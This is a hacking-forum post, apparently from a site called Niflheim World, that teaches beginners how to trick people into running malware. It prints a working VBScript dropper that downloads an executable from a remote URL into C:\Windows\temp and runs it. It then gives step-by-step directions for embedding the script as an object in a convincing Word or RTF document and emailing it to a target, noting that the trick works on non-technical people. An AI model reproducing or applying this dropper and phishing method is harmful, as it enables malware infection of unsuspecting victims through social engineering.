Niflheim World

Welcome to Niflheim !

  • First 5 messages from new users (pre-moderated user) will be checked for flood/spam before being posted on the forum. Users will also be checked for a multi-account.
    If you want to communicate without delay, get a free Huscarl status (how to get - User Groups), or buy premium status (how to buy - Premium status)

[For Beginners] Making people clicking on your executable


hacxx

Local User
Bond
Joined
Sep 28, 2020
Messages
1,473
Reaction score
38
NL COIN
4,776
Trying to make people click on your executable is a art nowadays, even if all the hooks are set in your fake email there is a problem of not been possible to send the executable. A good choice is create a Word document (.doc) or a Rich Text Format (.rtf) and insert a object.

For this article i used a common vbs dropper that was configured to download and execute after the user double click in the object inside the document.

Most people thinks that Word document are only harmful if macro is activated, they are wrong.

101 lesson


1 - Let's do this. Save the following code as file.vbs
Code:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
 dim bStrm: Set bStrm = createobject("Adodb.Stream")
 xHttp.Open "GET", "http://127.0.0.1/1.exe", False
 xHttp.Send
 with bStrm
     .type = 1 '
     .open
     .write xHttp.responseBody
    .savetofile "C:\Windows\temp\file.exe", 2 '
 end with
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("C:\Windows\temp\file.exe"), 1, True
2 - Change http://127.0.0.1/1.exe to your remote file and keep C:\Windows\temp\file.exe as it is.
(Use your own exe instead of file.vbs as it is detected. This is for demo purpose only)

3 - Open Wordpad or Winword (In this example, i'm using Wordpad).

4 - Create a good document with a logo and add as many elements as you can to make it believable like signature, etc.

5 - Write the sentence "Double click below if not showing the image"

6 - And then click on "Insert a object"

7 - Select "Create from file" and select the vbs file

8 - Right click in the icon and "Packager Shell Object Object" > "Rename Package" and remove the "label"



9 - Save the document and send as attachment to your target email.



Note: This method works only with non tech people. The reason why this method works is because users have more trust in clicking in a link inside a document than clicking directly on a exe.

Download:

Virus Scan: Full of virus for file.vbs
Not Scanned to not disclose method
 
shape1
shape2
shape3
shape4
shape7
shape8
Top